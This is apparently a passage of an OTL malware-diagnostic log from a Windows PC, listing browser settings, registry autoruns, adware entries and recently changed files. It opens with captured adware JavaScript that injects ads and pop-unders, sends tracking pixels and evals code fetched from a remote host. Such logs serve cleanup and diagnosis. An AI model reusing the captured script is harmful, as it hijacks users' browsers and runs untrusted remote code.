e=d[g].innerText;'undefined'==typeof e&&(e=d[g].textContent);for(var l=e.toLowerCase().split(/[\\s,-]/g),h=0;h<l.length;h++)4>l[h].length||(b[l[h]]?b[l[h]]++: b[l[h]]=1)}catch(m){}var e=[],k;for(k in b)e.push([k,b[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;k<e.length;k++)a+=' '+e[k][0]}return a.replace(/[_-]/g,' ').substring(0,1024)};a.injectComplianceBanner=function(){var c=document.getElementsByTagName('body')[0];if(0!=c.children.length){var b=document.createElement('div');b.id='cmsie';var d='<span style=\"font: xx-small;color: rgb(153, 153, 153);height: 15px;  font-family: Tahoma;font-size: 8px;padding-right: 22px;padding-top: 1px;float: right;  top: 2px;  text-decoration: none;line-height: 15px;\">Ad by '+ a.extName+'</span>';b.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');b.innerHTML=d;c.insertBefore(b,c.children[0])}};a.prepareUrl=function(){var c='?',b;for(b in d.directParams)c+=b+'='+d.directParams[b]+'&';c+='k='+encodeURIComponent(d.getKeywords());return'//'+a.hostnames['http:'==window.self.location.protocol?0:1]+c};a.tp=function©{if©{c=a.utils.l.decode©;try{a.response=eval©}catch(b){}if(a.response&&a.response[0]&&(a.response[0][0]= a.response[0][0].replace('zig_pp','rTa5vTwEqG59pc5FqHxXrjnGrHgFrjg7qE%3D%3D'),c=a.response[0][3],c=7,7===c&&'function'==typeof a.products['code_'+c]))a.products['code_'+c](a.response)}};a.getInstructions=function©{var b='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(c+b):a.utils.ajax.get(c,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var c=a.prepareUrl();d.utils.getInstructions(c,'tp')};a.injectOnload=function(){'complete'=== document.readyState||10<a.OnloadCap?a.initPop():setTimeout(function(){a.OnloadCap++;a.injectOnload()},200)};d.utils.msie&&9>d.utils.msie||(window.self==window.top&&(a.utils.msie?a.injectOnload():a.initPop()),'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a))}};})();(function(){new function(){var c=this;c.prefix=\"hggasdgjhsagd\";c.pixelHostname=\"//direct_pop.unition.org/\";c.token=\"px.pluginh\";c.pxlData=\"__pdt\";document.getElementById(\"__hggasdgjhsagd_once\")||(c.Utils=new function(){var a=this;a.l=new function(){var b=this;b.xlat=\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\";b.encode=function(e){e=b._utf8_encode(e);for(var d=\"\",m=0;m<e.length;){var f=e.charCodeAt(m++),a=e.charCodeAt(m++),c=e.charCodeAt(m++),n=f>>2,f=(f&3)<<4|a>>4,l=(a&15)<< 2 | c>>6,h=c&63;isNaN(a)?l=h=64:isNaN©&&(h=64);d=d+b.xlat.charAt(n)+b.xlat.charAt(f)+(64==l?\"=\":b.xlat.charAt(l))+(64==h?\"=\":b.xlat.charAt(h))}return d};b._utf8_encode=function(e){if(e&&e.length){for(var d=\"\",b=0;b<e.length;b++){var a=e.charCodeAt(b);128>a?d+=String.fromCharCode(a):(127<a&&2048>a?d+=String.fromCharCode(a>>6|192):(d+=String.fromCharCode(a>>12|224),d+=String.fromCharCode(a>>6&63|128)),d+=String.fromCharCode(a&63|128))}return d}return e};b.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g, \"\");for(var d=\"\",b=0;b<a.length;){var c=this.xlat.indexOf(a.charAt(b++)),k=this.xlat.indexOf(a.charAt(b++)),g=this.xlat.indexOf(a.charAt(b++)),n=this.xlat.indexOf(a.charAt(b++)),l=(k&15)<<4|g>>2,h=(g&3)<<6|n,d=d+String.fromCharCode(c<<2|k>>4);64!=g&&0<l&&(d+=String.fromCharCode(l));64!=n&&0<h&&(d+=String.fromCharCode(h))}return this._utf8_decode(d)};b._utf8_decode=function(a){for(var b=\"\",c=0;c<a.length;){var f=a.charCodeAt©;if(128>f)b+=String.fromCharCode(f),c++;else if(191<f&&224>f)var k=a.charCodeAt(c+ 1),b=b+String.fromCharCode((f&31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|g&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split(\"__pdt\");b.length&&(b=a.l.decode(b[1]));return function(a){var b= {};a.replace(/([^?=&]+)(=([^&]*))?/g,function(a,c,e,g){b[c]=decodeURIComponent(g)});return b}(b.replace(/^.*\\?/,\"\"))};a.getHostname=function(a){var c=document.createElement(\"a\");c.href=a;return c.hostname}},function(){var a=document.createElement(\"div\");a.id=\"__hggasdgjhsagd_once\";a.setAttribute(\"style\",\"display:none;\");var b=document.getElementsByTagName(\"body\")[0];b&&b.appendChild(a)}(),c.pixel=function(){var a=c.Utils.getParams();if(a&&a.cid){var b=c.pixelHostname+\"?\",e=a.sh||\"\",d=a.cid||\"\",m= a.tid||\"\",f=a.adtid||\"\",k=a.pid||\"\",g=a.cc||\"\",n=a.eid||\"\",l=a.hid||\"\",h=a.version?a.version:\"1\",a=a.tid||\"\",q=c.Utils.getHostname(location.href),e={pid:k,cc:g,eid:n,hid:l,v:h,ch:\"0\",cid:d,tid:3,adtid:m,smid:f,pbid:\"0\",oh:encodeURIComponent(q),sh:encodeURIComponent(e)},p;for(p in e)b+=p+\"=\"+e[p]+\"&\";b=b.slice(0,-1);(new Image).src=b}},-1<location.href.indexOf(c.token)&&-1<location.href.indexOf(c.pxlData)&&c.pixel(),c.Utils.msie&&8>c.Utils.msie||\"undefined\"==typeof window[c.prefix]&&(window[c.prefix]= c))};})();}catch(e){}");
FF - prefs.js..keyword.URL: "http://www.bing.com/...9DF&PC=U079&q="
FF - user.js - File not found
 
FF:[b]64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll File not found
FF:[b]64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:[b]64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll ()
FF - HKLM\Software\MozillaPlugins\@canon.com/EPPEX: C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF - HKLM\Software\MozillaPlugins\@logitech.com/HarmonyRemote,version=1.0.0: C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Becky's\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/11/06 23:59:39 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 33.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/11/06 23:59:39 | 000,000,000 | ---D | M]
 
[2011/08/16 18:19:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Becky's\AppData\Roaming\mozilla\Extensions
[2015/02/10 17:49:00 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Becky's\AppData\Roaming\mozilla\Firefox\Profiles\rcg3pbqg.default\extensions
[2014/01/08 20:55:10 | 000,002,273 | ---- | M] () -- C:\Users\Becky's\AppData\Roaming\mozilla\firefox\profiles\rcg3pbqg.default\searchplugins\bingp.xml
[2013/11/12 14:39:37 | 000,000,915 | ---- | M] () -- C:\Users\Becky's\AppData\Roaming\mozilla\firefox\profiles\rcg3pbqg.default\searchplugins\yahoo.xml
[2015/02/09 15:58:32 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/11/06 23:59:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/11/07 00:00:10 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - homepage: http://search.yahoo....r=spigot-yhp-ch
CHR - Extension: Google Docs = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\
CHR - Extension: Google Drive = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Search = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: ProShopper = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\eokkoajdojoligedidinemfgbcmmhlfj\4.87\
CHR - Extension: Wikipedia Quick Hints = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldnhgfghebflgcndlbppfanbchpgmkna\249\
CHR - Extension: Chrome In-App Payments service = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0\
CHR - Extension: Gmail = C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
 
O1 HOSTS File: ([2009/06/10 15:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit: - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
O2 - BHO: (Deealpeak) - {c280185a-c8e2-4891-ac1a-8a98e09ccc8a} - C:\Program Files (x86)\Deealpeak\oSmNSQ24IsmnPx.dll ()
O2 - BHO: (WOT Helper) - {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} - C:\Program Files (x86)\WOT\WOT.dll ()
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O2 - BHO: (no name) - {FCBCCB87-9224-4B8D-B117-F56D924BEB18} - No CLSID value found.
O3:[b]64bit: - HKLM\..\Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - No CLSID value found.
O3 - HKLM\..\Toolbar: (WOT) - {71576546-354D-41c9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll ()
O3 - HKLM\..\Toolbar: (no name) - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - No CLSID value found.
O3 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\Toolbar\WebBrowser: (no name) - {472734EA-242A-422B-ADF8-83D1E48CC825} - No CLSID value found.
O3 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\Toolbar\WebBrowser: (no name) - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No CLSID value found.
O3 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\Toolbar\WebBrowser: (WOT) - {71576546-354D-41C9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll ()
O4:[b]64bit: - HKLM..\Run: [CanonSolutionMenu] C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe (CANON INC.)
O4:[b]64bit: - HKLM..\Run: [IntelliPoint] c:\Program Files\Microsoft IntelliPoint\ipoint.exe (Microsoft Corporation)
O4:[b]64bit: - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit: - HKLM..\Run: [SmartMenu] C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe ()
O4 - HKLM..\Run: []  File not found
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKLM..\RunOnce: [SMRequiresRestart]  File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2
O7 - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1
O9:[b]64bit: - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit: - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O10:[b]64bit: - Protocol_Catalog9\Catalog_Entries64\000000000001 - C:\Windows\SysNative\iavlsp64.dll ()
O10:[b]64bit: - Protocol_Catalog9\Catalog_Entries64\000000000002 - C:\Windows\SysNative\iavlsp64.dll ()
O10:[b]64bit: - Protocol_Catalog9\Catalog_Entries64\000000000013 - C:\Windows\SysNative\iavlsp64.dll ()
O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Windows\SysWow64\iavlsp.dll (iolo technologies, LLC)
O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Windows\SysWow64\iavlsp.dll (iolo technologies, LLC)
O10 - Protocol_Catalog9\Catalog_Entries\000000000013 - C:\Windows\SysWow64\iavlsp.dll (iolo technologies, LLC)
O13[b]64bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)
O16 - DPF: {E6F480FC-BD44-4CBA-B74A-89AF7842937D} http://content.syste...ri_4.4.21.0.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 208.67.222.222 208.67.220.220 208.67.222.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{6F503A33-0AB9-4ECE-BD77-C66731FB70DC}: DhcpNameServer = 24.220.0.10 24.220.0.11
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{76F3EE8A-31B0-4DE8-9228-50821538B8EF}: DhcpNameServer = 208.67.222.222 208.67.220.220 208.67.222.220
O18:[b]64bit: - Protocol\Handler\belarc - No CLSID value found
O18:[b]64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:[b]64bit: - Protocol\Handler\wot - No CLSID value found
O18 - Protocol\Handler\belarc {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\Advisor\System\BAVoilaX.dll (Belarc, Inc.)
O18 - Protocol\Handler\wot {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - C:\Program Files (x86)\WOT\WOT.dll ()
O20:[b]64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{0695f9ff-5330-11e0-9762-0026188d6f6f}\Shell - "" = AutoRun
O33 - MountPoints2\{0695f9ff-5330-11e0-9762-0026188d6f6f}\Shell\AutoRun\command - "" = J:\setup.exe -a
O33 - MountPoints2\{0695fb71-5330-11e0-9762-0026188d6f6f}\Shell - "" = AutoRun
O33 - MountPoints2\{0695fb71-5330-11e0-9762-0026188d6f6f}\Shell\AutoRun\command - "" = J:\setup.exe -a
O33 - MountPoints2\{a26571d6-4b54-11e3-a674-0026188d6f6f}\Shell - "" = AutoRun
O33 - MountPoints2\{a26571d6-4b54-11e3-a674-0026188d6f6f}\Shell\AutoRun\command - "" = K:\VZW_Software_upgrade_assistant.exe
O33 - MountPoints2\J\Shell\AutoRun\command - "" = J:\autorun.exe
O33 - MountPoints2\J\Shell\phone\command - "" = J:\autorun.exe
O34 - HKLM BootExecute: (autocheck autochk /p \??\C:)
O34 - HKLM BootExecute: (ጔ)
O34 - HKLM BootExecute: (ݭ숐Ιᜄጔ쉀ٶǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (콐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (죰ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (예ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (젘ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (졈ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (저ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (딐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (죘ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (좨ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (뤘ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (잸ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (졠ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (머ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (욘ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쵀ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (웈ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (떸ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쫐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (릨ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (믨ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (몀ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (鴨ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (든ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (륈ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (른ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (뻐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (멐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (좐ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (먈ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (셀ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쾀ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (먠ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쓨Ǫ1Κ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (씰ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (뫠ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쥨ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쾘ǪqΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (즀ǪΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (빀Ǫ!Κ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (썐Ǫ±Κ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쉸ǪAΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쑰ǪQΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쒠ǪaΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (써ǪñΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쐐ǪΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (뫸ǪΙ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (콨Ǫ¡Κ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (싘ǪıΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (숰ǪÁΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쎘ǪÑΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쎀ǪáΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쌠ǪűΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쏠ǪāΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쐨ǪΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쑘ǪġΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (션ǪɑΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (솸ǪŁΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쉈ǪőΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (싰ǪšΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (솠ǪDZΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (쇨ǪƁΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (슨Ǫ‘Κ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (싀Ǫ숐Ιݔጠ)
O34 - HKLM BootExecute: ©
O34 - HKLM BootExecute: (ƱΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (섐ǪǡΚ)
O34 - HKLM BootExecute: ()
O34 - HKLM BootExecute: (섨Ǫ숐Ιᜄጔ봘ݦ)
O34 - HKLM BootExecute: (숐Ϊ́ጠ)
O34 - HKLM BootExecute: (lor rendering.)
O34 - HKLM BootExecute: (autocheck smrgdf C:\Users\Becky's\AppData\Roaming\iolo\)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2015/02/11 08:12:55 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Becky's\Desktop\OTL.exe
[2015/02/10 07:38:55 | 000,032,912 | ---- | C] (EldoS Corporation) -- C:\Windows\SysNative\drivers\rawdsk3.sys
[2015/02/10 07:38:22 | 001,728,776 | R--- | C] (CYREN Inc.) -- C:\Windows\SysNative\drivers\ampse.sys
[2015/02/10 07:38:14 | 000,000,000 | ---D | C] -- C:\ProgramData\Commtouch
[2015/02/10 07:38:14 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Commtouch
[2015/02/10 07:38:14 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Commtouch
[2015/02/10 07:14:26 | 000,000,000 | ---D | C] -- C:\logs
[2015/02/09 15:13:46 | 000,000,000 | ---D | C] -- C:\ProgramData\374311380
[2015/02/09 15:11:01 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FlexibleShopper
[2015/02/09 14:47:02 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\appraiser
[2015/02/01 15:22:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ddeaulapeakk
[2015/02/01 15:22:19 | 000,000,000 | ---D | C] -- C:\ProgramData\894336378694988169
[2015/02/01 15:21:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Deealpeak
[8 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2015/02/11 08:10:43 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Becky's\Desktop\OTL.exe
[2015/02/11 07:50:19 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/02/10 07:57:31 | 000,018,736 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/02/10 07:57:31 | 000,018,736 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/02/10 07:39:25 | 000,000,448 | ---- | M] () -- C:\Windows\SysWow64\iolo.ini
[2015/02/10 07:39:25 | 000,000,448 | ---- | M] () -- C:\Windows\SysNative\iolo.ini
[2015/02/10 07:32:21 | 000,000,340 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForBecky's.job
[2015/02/10 07:32:06 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/02/10 07:31:52 | 000,000,386 | ---- | M] () -- C:\Windows\SysNative\ioloBootDefrag.cfg
[2015/02/10 07:31:40 | 703,455,232 | -HS- | M] () -- C:\hiberfil.sys
[2015/02/10 07:21:39 | 000,001,487 | ---- | M] () -- C:\Users\Becky's\Desktop\LiveBoost.lnk
[2015/02/10 07:21:38 | 000,001,483 | ---- | M] () -- C:\Users\Becky's\Desktop\System Mechanic Professional.lnk
